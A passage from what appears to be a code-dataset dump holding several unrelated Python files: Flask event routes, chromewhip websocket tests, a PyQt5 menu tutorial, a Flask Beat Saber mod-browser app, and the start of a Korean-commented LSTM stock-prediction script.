EventoTable.query.get(id)\n\n cpf = request.json['cpf']\n data = request.json['data']\n hinicio = request.json['inicio']\n hfinal = request.json['final']\n predio = request.json['predio']\n\n try:\n if cpf != '':\n mrd = PessoaTable.query.filter_by(cpf=cpf).first()\n mrd = MoradorTable.query.filter_by(morador_idpes=mrd.id).first()\n evento.evento_idmrd = mrd.id\n\n if hinicio != '':\n evento.inicio = datetime.datetime.strptime(evento.inicio.strftime('%d/%m/%Y')+' '+hinicio, '%d/%m/%Y %H:%M')\n\n if hfinal != '':\n evento.final = 
datetime.datetime.strptime(evento.final.strftime('%d/%m/%Y')+' '+hfinal, '%d/%m/%Y %H:%M')\n\n if data != '':\n dinicio = data+' '+evento.inicio.strftime('%H:%M')\n dfinal = data+' '+evento.final.strftime('%H:%M')\n \n evento.inicio = datetime.datetime.strptime(dinicio, '%d/%m/%Y %H:%M')\n evento.final = datetime.datetime.strptime(dfinal, '%d/%m/%Y %H:%M')\n\n if predio != '':\n evento.evento_idprd = predio\n\n db.session.commit()\n \n return jsonify({\"message\":'Informações do evento alteradas com sucesso!', \"status\":200})\n \n except:\n return jsonify({\"message\":'Não foi possível alterar as informações do evento. Verifique as informações inseridas.', \"status\":200})\n\n@bp_evento.route('/evento/deletar/', methods=['DELETE'])\ndef delete(id):\n\n try:\n evento = EventoTable.query.get(id)\n \n db.session.delete(evento)\n db.session.commit()\n\n return jsonify({\"message\":'Evento deletado com sucesso!',\"status\":200})\n \n except:\n return jsonify({\"message\":'Erro ao deletar evento.', \"status\":400})","repo_name":"PedroLS2603/back-end-api-tcc","sub_path":"app/api/event/event_routes.py","file_name":"event_routes.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27286302134","text":"import asyncio\nimport copy\nimport json\nimport logging\nimport queue\n\nimport pytest\nimport websockets\nfrom websockets.exceptions import ConnectionClosed\n\n\nfrom chromewhip import chrome, helpers\nfrom chromewhip.protocol import page, network\n\nTEST_HOST = 'localhost'\nTEST_PORT = 32322\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\n\nclass ChromeMock:\n\n def __init__(self, host, port):\n self._tabs = []\n\n async def connect(self):\n tab = chrome.ChromeTab('test', 'about:blank', f'ws://{TEST_HOST}:{TEST_PORT}', '123')\n self._tabs = [tab]\n\n @property\n def tabs(self):\n return self._tabs\n\n\n@pytest.fixture\nasync def chrome_tab():\n \"\"\"Ensure Chrome is running\n \"\"\"\n browser = ChromeMock(host=TEST_HOST, port=TEST_PORT)\n await browser.connect()\n chrome_tab = browser.tabs[0]\n yield chrome_tab\n print(\"gracefully disconnecting chrome tab...\")\n try:\n await chrome_tab.disconnect()\n except ConnectionClosed:\n pass\n\ndelay_s = float\n\n\ndef init_test_server(triggers: dict, initial_msgs: [dict] = None, expected: queue.Queue = None):\n \"\"\"\n :param initial_msgs:\n :param triggers:\n :param expected: ordered sequence of messages expected to be sent by chromewhip\n :return:\n \"\"\"\n async def test_server(websocket, path):\n \"\"\"\n :param websocket:\n :param path:\n :return:\n \"\"\"\n log.info('Client connected! 
Starting handler!')\n if initial_msgs:\n for m in initial_msgs:\n await websocket.send(json.dumps(m, cls=helpers.ChromewhipJSONEncoder))\n\n c = 0\n\n try:\n while True:\n msg = await websocket.recv()\n log.info('Test server received message!')\n c += 1\n obj = json.loads(msg)\n\n if expected:\n try:\n exp = expected.get(block=False)\n except queue.Empty:\n pytest.fail('more messages received that expected')\n\n assert exp == obj, 'message number %s does not match, exp %s != recv %s' % (c, exp, obj)\n\n # either id or method\n is_method = False\n id_ = obj.get('id')\n\n if not id_:\n id_ = obj.get('method')\n if not id_:\n pytest.fail('received invalid message, no id or method - %s ' % msg)\n is_method = True\n\n response_stream = triggers.get(id_)\n\n if not response_stream:\n pytest.fail('received unexpected message of %s = \"%s\"'\n % ('method' if is_method else 'id', id_))\n\n if not len(response_stream):\n log.debug('expected message but no expected response, continue')\n\n log.debug('replying with payload \"%s\"' % response_stream)\n for r in response_stream:\n if isinstance(r, int):\n await asyncio.sleep(r)\n else:\n await websocket.send(json.dumps(r, cls=helpers.ChromewhipJSONEncoder))\n except asyncio.CancelledError as e:\n # TODO: look at failure logic here, why cancelled error? why empty? empty could mean it is working properly\n # if expected.empty():\n # pytest.fail('less messages received that expected')\n raise e\n return test_server\n\n\n@pytest.mark.asyncio\nasync def test_send_command_can_trigger_on_event_prior_to_commmand_containing_event_id(event_loop, chrome_tab):\n\n msg_id = 4\n frame_id = '3228.1'\n url = 'http://example.com'\n\n chrome_tab._message_id = msg_id - 1\n f = page.Frame(frame_id, 'test', url, 'test', 'text/html')\n p = page.Page.navigate(url)\n fe = page.FrameNavigatedEvent(f)\n\n ack = {'id': msg_id, 'result': {'frameId': frame_id}}\n triggers = {\n msg_id: [ack]\n }\n\n end_msg = copy.copy(p[0])\n end_msg['id'] = msg_id\n q = queue.Queue()\n q.put(end_msg)\n\n initial_msgs = [fe]\n\n test_server = init_test_server(triggers, initial_msgs=initial_msgs, expected=q)\n start_server = websockets.serve(test_server, TEST_HOST, TEST_PORT)\n server = await start_server\n await chrome_tab.connect()\n\n log.info('Sending command and awaiting...')\n result = await chrome_tab.send_command(p, await_on_event_type=page.FrameNavigatedEvent)\n assert result.get('ack') is not None\n assert result.get('event') is not None\n event = result.get('event')\n assert isinstance(event, page.FrameNavigatedEvent)\n assert event.frame.id == f.id\n assert event.frame.url == f.url\n\n server.close()\n await server.wait_closed()\n\n@pytest.mark.asyncio\nasync def test_send_command_can_trigger_on_event_after_commmand_containing_event_id(event_loop, chrome_tab):\n msg_id = 4\n frame_id = '3228.1'\n url = 'http://example.com'\n\n chrome_tab._message_id = msg_id - 1\n f = page.Frame(frame_id, 'test', url, 'test', 'text/html')\n p = page.Page.navigate(url)\n fe = page.FrameNavigatedEvent(f)\n\n ack = {'id': msg_id, 'result': {'frameId': frame_id}}\n triggers = {\n msg_id: [ack, delay_s(1), fe]\n }\n\n end_msg = copy.copy(p[0])\n end_msg['id'] = msg_id\n q = queue.Queue()\n q.put(end_msg)\n q.put(copy.copy(end_msg))\n\n test_server = init_test_server(triggers, expected=q)\n start_server = websockets.serve(test_server, TEST_HOST, TEST_PORT)\n server = await start_server\n await chrome_tab.connect()\n\n log.info('Sending command and awaiting...')\n result = await chrome_tab.send_command(p, 
await_on_event_type=page.FrameNavigatedEvent)\n assert result.get('ack') is not None\n assert result.get('event') is not None\n event = result.get('event')\n assert isinstance(event, page.FrameNavigatedEvent)\n assert event.frame.id == f.id\n assert event.frame.url == f.url\n\n server.close()\n await server.wait_closed()\n\n@pytest.mark.asyncio\nasync def test_send_command_can_trigger_on_event_with_input_event(event_loop, chrome_tab):\n \"\"\"test_send_command_can_trigger_on_event_with_input_event\n Below is test case that will workaround this issue\n https://github.com/chuckus/chromewhip/issues/2\n \"\"\"\n msg_id = 4\n old_frame_id = '2000.1'\n frame_id = '3228.1'\n url = 'http://example.com'\n\n chrome_tab._message_id = msg_id - 1\n f = page.Frame(frame_id, 'test', url, 'test', 'text/html')\n p = page.Page.navigate(url)\n fe = page.FrameNavigatedEvent(f)\n fsle = page.FrameStoppedLoadingEvent(frame_id)\n\n # command ack is not related to proceeding events\n ack = {'id': msg_id, 'result': {'frameId': old_frame_id}}\n triggers = {\n msg_id: [ack, delay_s(1), fe, fsle]\n }\n\n end_msg = copy.copy(p[0])\n end_msg['id'] = msg_id\n q = queue.Queue()\n q.put(end_msg)\n\n test_server = init_test_server(triggers, expected=q)\n start_server = websockets.serve(test_server, TEST_HOST, TEST_PORT)\n server = await start_server\n await chrome_tab.connect()\n\n log.info('Sending command and awaiting...')\n result = await chrome_tab.send_command(p,\n input_event_type=page.FrameNavigatedEvent,\n await_on_event_type=page.FrameStoppedLoadingEvent)\n assert result.get('ack') is not None\n assert result.get('event') is not None\n event = result.get('event')\n assert isinstance(event, page.FrameStoppedLoadingEvent)\n assert event.frameId == f.id\n\n server.close()\n await server.wait_closed()\n\n@pytest.mark.asyncio\nasync def xtest_can_register_callback_on_devtools_event(event_loop, chrome_tab):\n # TODO: double check this part of the api is implemented\n interception_id = '3424.1'\n msg_id = 7\n chrome_tab._message_id = msg_id - 1\n fake_request = network.Request(url='http://httplib.org',\n method='POST',\n headers={},\n initialPriority='superlow',\n referrerPolicy='origin')\n msgs = [\n network.RequestInterceptedEvent(interceptionId=interception_id,\n request=fake_request,\n resourceType=\"Document\",\n isNavigationRequest=False)\n\n ]\n\n enable = network.Network.setRequestInterceptionEnabled(enabled=True)\n\n # once emable command comes, send flurry in intercept events\n triggers = {\n msg_id: msgs\n }\n\n expected = queue.Queue()\n e0 = copy.copy(enable[0])\n e0['id'] = msg_id\n expected.put(e0)\n e1 = network.Network.continueInterceptedRequest(interceptionId=interception_id)\n expected.put(e1)\n\n test_server = init_test_server(triggers, expected=expected)\n start_server = websockets.serve(test_server, TEST_HOST, TEST_PORT)\n server = await start_server\n await chrome_tab.connect()\n\n log.info('Sending command and awaiting...')\n # TODO: registration api\n\n # no point returning data as nothing to do with it.\n # but how would i go about storing all the events being collected?\n # - this is not the api for it, just add an api for storing events in a queue\n # TODO: how do declare return type of method?\n async def cb_coro(event: network.RequestInterceptedEvent):\n return network.Network.continueInterceptedRequest(interceptionId=event.interceptionId)\n\n with chrome_tab.schedule_coro_on_event(coro=cb_coro,\n event=network.RequestInterceptedEvent):\n await chrome_tab.send_command(enable)\n\n 
server.close()\n await server.wait_closed()\n","repo_name":"chazkii/chromewhip","sub_path":"tests/test_chrome.py","file_name":"test_chrome.py","file_ext":"py","file_size_in_byte":9807,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"72"} +{"seq_id":"22636284562","text":"## ex_04 체크 메뉴, 컨텍스트 메뉴\nimport sys \nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QAction, QMenu, qApp\nfrom PyQt5.QtCore import QCoreApplication\n\nclass Exam(QMainWindow): \n def __init__(self):\n super().__init__()\n self.initUI()\n\n# 각 그룹, 메뉴의 위치는 헷갈리지 않도록 작성하기. ★\n# 기본 틀은 맨 위에 메인 그룹, 메뉴 객체 / 서브 그룹, 서브 메뉴\n\n def initUI(self):\n self.statusBar()\n self.statusBar().showMessage(\"안녕하세요!\")\n\n menu = self.menuBar() # 메뉴바 생성\n menu_file = menu.addMenu('File') # 메인 그룹 생성\n menu_edit = menu.addMenu('Edit') # 메인 그룹 생성\n menu_view = menu.addMenu('View') # 메인 그룹 생성\n\n file_exit = QAction('Exit', self) # 메뉴 객체 생성\n file_exit.setShortcut('ctrl+Q') # 단축키 지정\n file_exit.setStatusTip('누르면 잘가고~') # 상태표시줄에 표시될 문구.\n new_txt = QAction('텍스트 파일', self)\n new_py = QAction('파이썬 파일', self)\n view_stat = QAction('상태표시줄',self, checkable=True)\n view_stat.setChecked(True)\n\n # file_exit.triggered.connect(QCoreApplication.instance().quit)\n file_exit.triggered.connect(qApp.quit) # 더 간편하게 끄기 가능.\n view_stat.triggered.connect(self.tglStat) # 상태표시줄 끄고 켜기.\n\n file_new = QMenu('New', self) # 서브 그룹 생성\n\n file_new.addAction(new_txt) # 서브 메뉴 생성\n file_new.addAction(new_py) # 서브 메뉴 생성\n\n menu_file.addMenu(file_new)\n menu_file.addAction(file_exit) # 메뉴 등록\n menu_view.addAction(view_stat)\n self.resize(450, 400)\n self.show()\n \n def tglStat(self, state):\n if state:\n self.statusBar().show()\n else:\n self.statusBar().hide()\n def contextMenuEvent(self, QContextMenuEvent): # 이미 정의된 함수이므로 재정의해서 사용\n cm = QMenu(self)\n\n quit = cm.addAction('Quit')\n\n action = cm.exec_(self.mapToGlobal(QContextMenuEvent.pos())) # 전체적인 맵의 위치를 저장해서 넘김. 
추후 우클릭을 어느 위치에서 했냐에 따라 다른 메뉴나올 수 있도록\n if action == quit:\n qApp.quit() # 위의 QCoreApplication보다 더 간단한 방법으로는 qApp import한 후 이렇게 적어주면 끝!\n\n\napp = QApplication(sys.argv) \nw = Exam() \nsys.exit(app.exec_()) \n","repo_name":"Byunggu-Son/MS_AI_School","sub_path":"DAY91_23-02-15/ex_04.py","file_name":"ex_04.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24899430075","text":"from flask import Flask, render_template, request\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pymongo\nimport os\nimport re\nfrom datetime import datetime\n\napp = Flask(__name__)\n\nsoup = BeautifulSoup(requests.get('https://questboard.xyz').text, 'html.parser')\nfor br in soup.find_all(\"br\"):\n br.replace_with(\"\\n\")\nnews = soup.find(id='News')\ndaytexts = news.find_all(id='daytext')\nnewstexts = news.find_all(id='newstext')\ntitletexts = news.find_all(id='newstitle')\nnewsjson = {}\nfor i in range(0, len(daytexts)):\n newsjson[i] = {\n \"date\": daytexts[i].getText(),\n \"content\": newstexts[i].getText(),\n \"title\": titletexts[i].getText()\n }\n\n\n\n\nmdb = pymongo.MongoClient(f\"mongodb://dbUser:{os.environ['mdbt']}@cluster0-shard-00-00.gjopl.mongodb.net:27017,cluster0-shard-00-01.gjopl.mongodb.net:27017,cluster0-shard-00-02.gjopl.mongodb.net:27017/myFirstDatabase?ssl=true&replicaSet=atlas-10ra3i-shard-0&authSource=admin&retryWrites=true&w=majority\")\ndb = mdb.models.data\n\n@app.route('/api/qosmetics')\ndef apiqosmetics():\n items = []\n page = request.args.get('page')\n query = request.args.get('query')\n typeModel = request.args.get('type')\n direction = request.args.get('direction')\n if direction == \"asc\":\n sdn = 1\n else:\n sdn = -1\n search_item = {}\n if typeModel != \"all\":\n search_item['type'] = typeModel\n if query:\n search_item['name_lower'] = {\"$regex\": query.lower()}\n data = db.find(search_item).sort(\"time\", sdn).skip(int(page)*25).limit((int(page)+1)*25)\n for i in data:\n items.append({\n \"type\": i['type'],\n \"author\": i['author'],\n \"name\": i['name'],\n \"image\": i['image'],\n \"tags\": i['tags'],\n \"download\": i['download'],\n \"time\": i['time'],\n })\n print(items)\n return {\n \"data\": items\n }\n\n@app.route('/page/pcmodel')\ndef pagepcmodel():\n modelid = request.args.get('id')\n d = requests.get(f'https://modelsaber.com/api/v2/get.php?filter=id:{modelid}').json()[modelid]\n data = {\n 'name': d['name'],\n 'content': f'''\n Type: {d['type']}
\n Author: {d['author']}\n Date: {d['date']}\n Download\n OneClick
\n ''',\n 'img': d['thumbnail']\n }\n return render_template('page.html', data=data)\n\n@app.route('/page/questmodel')\ndef pagequestmodel():\n modelid = request.args.get('name').lower()\n d = db.find_one({\"name_lower\": modelid})\n data = {\n 'name': d['name'],\n 'content': f'''\n Type: {d['type']}
\n Author: {d['author']}\n Date: {datetime.utcfromtimestamp(int(d['time'])).strftime('%Y-%m-%d %H:%M:%S')}\n Tags: {d['tags']}\n Download
\n ''',\n 'img': d['image'],\n 'author': d['author'],\n 'tags': d['tags']\n \n }\n return render_template('page.html', data=data)\n\n@app.route('/qosmetics')\ndef qosmetics():\n return render_template('qosmetics.html')\n\n@app.route('/collections')\ndef collections():\n return render_template('collections.html')\n\n@app.route('/api/collections')\ndef apicollections():\n colljson = {}\n page = request.args.get('page')\n html = requests.get('https://hitbloq.com/map_pools/'+str(page)).text\n soup = BeautifulSoup(html, 'html.parser')\n collections = soup.find_all(\"div\", {\"class\": \"ranked-lists-entry-container\"})\n for i in range(0, len(collections)):\n colljson[i] = {\n \"download\": \"https://hitbloq.com\"+collections[i].find(\"a\", {\"class\": \"hashlist-download\"})['href'],\n \"image\": collections[i].find(\"img\", {\"class\": \"ranked-lists-entry-img\"})['src'],\n \"title\": collections[i].find(\"div\", {\"class\": \"ranked-lists-entry-title\"}).getText()\n }\n return colljson\n\n@app.route('/api/ssscrape')\ndef ssscrape():\n PHPSESSID = requests.get('https://scoresaber.com').cookies['PHPSESSID']\n cat = request.args.get('cat')\n sort = request.args.get('sort')\n star = request.args.get('maxStar')\n star1 = request.args.get('minStar')\n page = request.args.get('page')\n verified = request.args.get('verified')\n ranked = request.args.get('ranked')\n if verified == 'true':\n verified = '1'\n if ranked == 'true':\n ranked = '1'\n if ranked == 'false':\n ranked = '0'\n if verified == 'false':\n verified = '0'\n cookie_dict = {\n 'cat': cat,\n 'dark': '0',\n 'sort': sort,\n 'star': star,\n 'star1': star1,\n 'PHPSESSID': PHPSESSID,\n 'verified': verified,\n 'ranked': ranked\n }\n req_u_1 = f'https://scoresaber.com/imports/user-setting.php?verified={verified}&ranked={ranked}&sort={sort}&cat={cat}&star={star}&star1={star1}'\n requests.get(req_u_1)\n html = requests.get('https://scoresaber.com?page='+page, cookies=cookie_dict).text\n soup = BeautifulSoup(html, 'html.parser')\n songs = soup.find('tbody')\n songs = songs.find_all('tr')\n songJson = {}\n for i in range(0, len(songs)):\n songJson[i] = {\n \"image\": songs[i].find(\"td\", class_=\"song\").find('img')['src'],\n \"name\": songs[i].find(\"td\", class_=\"song\").find('a').getText().strip(),\n \"difficulty\": songs[i].find(\"td\", class_=\"difficulty\").getText().strip(),\n \"author\": songs[i].find(\"td\", class_=\"author\").find('a').getText().strip(),\n \"total_plays\": songs[i].find(\"td\", class_=\"scores\").getText().strip(),\n \"plays_pastday\": songs[i].find(\"td\", class_=\"percentage\").getText().strip(),\n \"stars\": songs[i].find(\"td\", class_=\"stars\").getText().strip()\n }\n\n return songJson\n\n\n\n\n\n\n@app.route('/api/noticeboard')\ndef noticeboard():\n return newsjson\n\n@app.route('/')\ndef main():\n out_html = ''\n for item in newsjson:\n out_html += f'{newsjson[item][\"title\"]}
{newsjson[item][\"date\"]} {newsjson[item][\"content\"]}
'\n return render_template('testing.html', board=out_html)\n\n\n@app.route('/api/maps')\ndef apimaps():\n sort = request.args.get('sort')\n page = request.args.get('page')\n query = request.args.get('query')\n chroma = request.args.get('chroma')\n ranked = request.args.get('ranked')\n noodle = request.args.get('noodle')\n if query is None:\n req_url = f\"https://api.beatsaver.com/search/text/{page}?sortOrder={sort}\"\n else:\n req_url = f\"https://api.beatsaver.com/search/text/{page}?q={query}&sortOrder={sort}&chroma={chroma}&noodle={noodle}&ranked={ranked}\"\n print(req_url)\n return requests.get(req_url).json()\n\n\n@app.route('/api/models')\ndef apimodels():\n sort = request.args.get('sort')\n query = request.args.get('query')\n page = int(request.args.get('page'))\n modeltype = request.args.get('type')\n direction = request.args.get('direction')\n req_url = f'https://modelsaber.com/api/v2/get.php?type={modeltype}&sort={sort}&filter={query}&start={page*26}&end={(page+1)*26}&sortDirection={direction}'\n print(req_url)\n r = requests.get(req_url)\n return r.json()\n\n@app.route('/scoresaber')\ndef scoresaber():\n return render_template('scoresaber.html')\n\n@app.route('/api/scoresaber')\ndef apiscoresaber():\n page = int(request.args.get('page'))+1\n cat = request.args.get('cat')\n req_url = f'http://scoresaber.com/api.php?function=get-leaderboards&cat={cat}&page={page}&limit=14'\n print(req_url)\n r = requests.get(req_url)\n return r.json()\n\n\n@app.route('/api/downloadscoresaber')\ndef downloadscoresaber():\n url = f\"https://beatsaver.com/api/search/text/0?q={request.args.get('name')}\"\n r = requests.get(url)\n id = r.json()['docs'][0]['id']\n print(id)\n return 'beatsaver://'+id\n\n@app.route('/maps')\ndef maps():\n return render_template('maps.html')\n\n@app.route('/models')\ndef models():\n return render_template('models.html')\n\n@app.route('/testing')\ndef testing():\n return render_template('testing.html')\n\n\n@app.route('/api/saberimg')\ndef saberimg():\n id = request.args.get('id')\n data = 'empty'\n png = requests.get(f'https://modelsaber.com/files/saber/{id}/image.png')\n if png.status_code == 200:\n data = png.raw\n jpg = requests.get(f'https://modelsaber.com/files/saber/{id}/image.jpg')\n if jpg.status_code == 200:\n data = jpg.raw\n gif = requests.get(f'https://modelsaber.com/files/saber/{id}/image.gif')\n if gif.status_code == 200:\n data = gif.raw\n print(data)\n return data\n\n\napp.run(host='0.0.0.0', port=8080)\n\n","repo_name":"SushiPython/bsmod","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70633312873","text":"# pip install -U finance-datareader\n\nimport numpy as np\nimport pandas as pd\nimport FinanceDataReader as fdr # 버전 문제로 오류가 날수 있다 아래 내용을 터미널에서 처리해 준다.\n# pip install -U finance-datareader : 해당 라이브러리 설치 해 주고\n# pip install --uphrade pandas : 오류가 나면 판다스 버전을 올려주고\n# pip install bs4 : bs4 오류가 나면 설치해 준다\n\nfrom sklearn import preprocessing\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, LSTM, Input, Activation\nfrom keras import optimizers\n\nimport tensorflow\n\n# FinanceDataReader.DataReader : 주가 데이터, 거래량, 시가, 고가, 저가, 수정주가, 주식 분할, 배당금 등을 제공.\n# 또한 지수 데이터, 환율 데이터, 암호화폐 데이터 등 다양한 종류의 금융 데이터도 가져올 수 있으며, DataFrame 형테임\n\ndef call_dataset(ticker = '005930', stt = '2022-01-01', end = '2023-08-16', history_points = 50):\n data = fdr.DataReader(ticker, stt, end)\n print('1. 
data: ', data)\n data = data.iloc[:,0:-1] # 행 번호 기준으로 값 읽기(모든 행에 대해서, 처음부터 ~ 마지막 열 전까지 가져오기)\n # 열을 한줄 제외하고 값을 가져오는것 (주식의 급락율 제외함)\n print('data: ', data.shape) # DataFrame의 행의개수, 열의 개수로 반환한다.\n data = data.values # 필드와 인덱스를 제외하고 값만 갖는다\n print('2. data: ', data) # DataFrame의 행의개수, 열의 개수로 반환한다.\n\n # sklearn.Preprocessing.MinMaxScaler() : sklearn에서 지원하는 전처리기 데이터를 0과 1 사이의 범위로 변환 (최소-최대 스케일링)\n\n data_normalizer = preprocessing.MinMaxScaler() # 데이터를 0~1 범위로 점철되게 하는 함수 call\n data_normalized = data_normalizer.fit_transform(data) # 데이터를 0~1 범위로 점철되게 함수 수행(데이터를 이용하여 훈련)\n print('data_normalized: ', data_normalized.shape)\n print('3. data_normalized: ', data_normalized)\n\n # using the last {history_points} open close high low volume data points, predict the next open value\n # (번역) 마지막 {history_points} 오픈 클로즈 하이 로우 볼륨 데이터 포인트를 사용하여 다음 시가를 예측합니다.\n # ohlcv를 가지고 오되, 관찰 일수 만큼 누적해서 쌓는다. (열방향으로)\n # 380 라인에서 -50을 한 후에 330 를 50개를 복사하는데 이때 값을 0부터 1씩 올라가게 한다. (0 ~ 330, 1~331, 2~332 .. 이렇게 들어간다)\n ohlcv_histories_normalized = np.array([data_normalized[i:i + history_points].copy() for i in range(len(data_normalized) - history_points)])\n print('7. ohlcv_histories_normalized : ',ohlcv_histories_normalized)\n\n # print('2. ohlcv_histories_normalized: ', ohlcv_histories_normalized)\n # print('ohlcv_histories_normalized: ', ohlcv_histories_normalized.shape)\n\n # 1차원 배열로 전달한다. np.arraty([data_normalized[][]])\n # data_normalized[:, 0] : 해당 2차원 배열에서 0번째 열에 있는 데이터를 반환한다(즉 2차원 배열에서 0번쨰 값만 남긴상태).\n # data_normalized[:, 0][i + history_points] : i는 0~(380-50)까지 for 문으로 반환하여 i+history_points 는 50~380 값을 반환한다.\n # 그러면 2차원 배열에서 0번째 열의 데이터만 가진 2차원 배열에서 50~380 배열 값을 가지고 np,array로 변환하여 1차원 배열로 반환한다.\n next_day_open_values_normalized = np.array([data_normalized[:, 0][i + history_points].copy() for i in range(len(data_normalized) - history_points)])\n # 1XN 벡터는 2차원 배열로 표현된 행 벡터이며, NX1 벡터는 2차원 배열로 표현된 열 벡터입니다.\n # 즉, 1XN 벡터를 NX1 벡터로 변환하는 작업은 해당 벡터를 전치(Transpose)하는 것과 동일합니다.\n print('8. next_day_open_values_normalized : ',next_day_open_values_normalized)\n next_day_open_values_normalized = np.expand_dims(next_day_open_values_normalized, -1) # 1XN 벡터 -> NX1 벡터로\n print('9. next_day_open_values_normalized : ',next_day_open_values_normalized)\n next_day_open_values = np.array([data[:, 0][i + history_points].copy() for i in range(len(data) - history_points)])\n next_day_open_values = np.expand_dims(next_day_open_values, -1) # 1XN 벡터 -> NX1 벡터로\n print('10. next_day_open_values : ',next_day_open_values)\n y_normalizer = preprocessing.MinMaxScaler()\n y_normalizer.fit(next_day_open_values)\n print('11. 
y_normalizer : ',y_normalizer)\n\n\n # 인풋 X : 그 이전의 OHLCV (from T = -50 to T = -1)\n # 아웃풋 y : 예측하고자 하는 주가 T = 0\n\n def calc_ema(values, time_period): #정규화된\n # https://www.investopedia.com/ask/answers/122314/what-exponential-moving-average-ema-formula-and-how-ema-calculated.asp\n # 지수이동평균법(EMA) 사용\n # 공식 : EMA =(Price(t)*k)+(EMA(t-1)*(1-k))\n # Price(t) : 현재 가격\n # EMA(t-1) : 바로 전 기간의 EMA\n # k = 2/(n+1) : n은 MA의 숫자 (예: MA-5,MA-7,MA-20,MA-100 등)\n sma = np.mean(values[:, 3])\n ema_values = [sma]\n k = 2 / (1 + time_period)\n for i in range(len(his) - time_period, len(his)):\n close = his[i][3]\n ema_values.append(close * k + ema_values[-1] * (1 - k))\n return ema_values[-1]\n\n technical_indicators = []\n for his in ohlcv_histories_normalized:\n # note since we are using his[3] we are taking the SMA of the closing price\n # print('his: ', his)\n # print('his[:, 3]: ', his[:, 3])\n sma = np.mean(his[:, 3]) # 각 데이터포인트별 Close Price 평균 (4번쨰 열에 대한 평균을 구한다.)\n print('3. sma: ', sma)\n '''# 위의 예시의 의미 \n 주어진 his는 여전히 리스트의 리스트 구조로 이루어진 3D 리스트입니다. 각 원소가 2D 리스트인 세 개의 서브 리스트를 포함하고 있습니다.\n his = [\n [[1, 2, 3, 1, 5], [1, 2, 3, 1, 5], [1, 2, 3, 1, 5]],\n [[2, 3, 4, 5, 6], [2, 3, 4, 5, 6], [2, 3, 4, 5, 6]],\n [[3, 4, 5, 6, 7], [3, 4, 5, 6, 7], [3, 4, 5, 6, 7]]\n ]\n 이제 np.mean(his[:, 3])을 계산하겠습니다. his[:, 3]는 3D 리스트 his의 첫 번째 차원에 해당하는 모든 서브 리스트들이 선택되며,\n 각 서브 리스트에서 3번째 열(인덱스 3에 해당하는 열)에 대한 값을 반환하게 됩니다. \n 먼저, 주어진 his에서 각 서브 리스트들의 3번째 열을 추출하겠습니다: \n [1, 1, 1]\n [5, 5, 5]\n [6, 6, 6]\n 이제 np.mean(his[:, 3])은 위에서 추출한 열에 대한 평균을 계산합니다: \n np.mean([1, 1, 1, 5, 5, 5, 6, 6, 6])\n 따라서 결과는 (1 + 1 + 1 + 5 + 5 + 5 + 6 + 6 + 6) / 9 ≈ 3.2222가 됩니다 \n '''\n # his 는 380에서 앞에 50개를 한개씩 더한 330, 331, 332 ...\n print('4. EMA-12 : ',calc_ema(his, 12))\n print('4. EMA-26 : ',calc_ema(his, 26))\n macd = calc_ema(his, 12) - calc_ema(his, 26) # 12일 EMA - 26일 EMA (지수이동평균 12일 기준 - 지수이동평균 26일 로 처리함)\n print('5. sma : ',sma)\n print('5. macd : ',macd)\n technical_indicators.append(np.array([sma]))\n\n technical_indicators = np.array(technical_indicators) # for 문으로 돌린 종가의 이동평균값 배열을 넘파이로 변환한다.\n\n tech_ind_scaler = preprocessing.MinMaxScaler() # 데이터를 0~1사이의 값으로 바꾼다.\n # fit_transform() 메서드는 두 단계를 합친 것으로,\n # 우선 데이터를 스케일링하기 위한 변환(Scaling)에 필요한 평균과 분산을 계산하고,\n # 그 후에 실제로 데이터를 스케일링하여 변환된 값을 반환합니다.\n technical_indicators_normalized = tech_ind_scaler.fit_transform(technical_indicators)\n\n # ??위에서 같은 작업을 하는데 중간에 값이 수정되는지 찍어봐야 할것 같음\n technical_indicators = np.array(technical_indicators)\n tech_ind_scaler = preprocessing.MinMaxScaler()\n technical_indicators_normalized = tech_ind_scaler.fit_transform(technical_indicators)\n\n # assert는 뒤에 나오는 조건문의 ture값을 보장하는 것으로 여기에는 안나왔지만 false가 될때는 따로 오류메시지를 줄 수 있다.\n # 참조 : https://blockdmask.tistory.com/553\n assert ohlcv_histories_normalized.shape[0] == next_day_open_values_normalized.shape[0] == technical_indicators_normalized.shape[0]\n\n print('ohlcv_histories_normalized.shape[0]: ', ohlcv_histories_normalized.shape[0])\n\n return ohlcv_histories_normalized, technical_indicators_normalized, next_day_open_values_normalized, next_day_open_values, y_normalizer\n\n\n\n\nnp.random.seed(4) #고정된 난수 발생을 위해 설정\n\nhistory_points = 50\nticker = '000660' # sk hynix\n\ndef main():\n print(\"tensorflow ver: \"+tensorflow.__version__) # 텐서플로 버전 확인\n tensorflow.random.set_seed(44) # 텐서플로에서 시드 44로 렌덤생성\n\n # dataset 생성\n ohlcv_histories, _, next_day_open_values, unscaled_y, y_normaliser = call_dataset(ticker=ticker)\n print('6. 
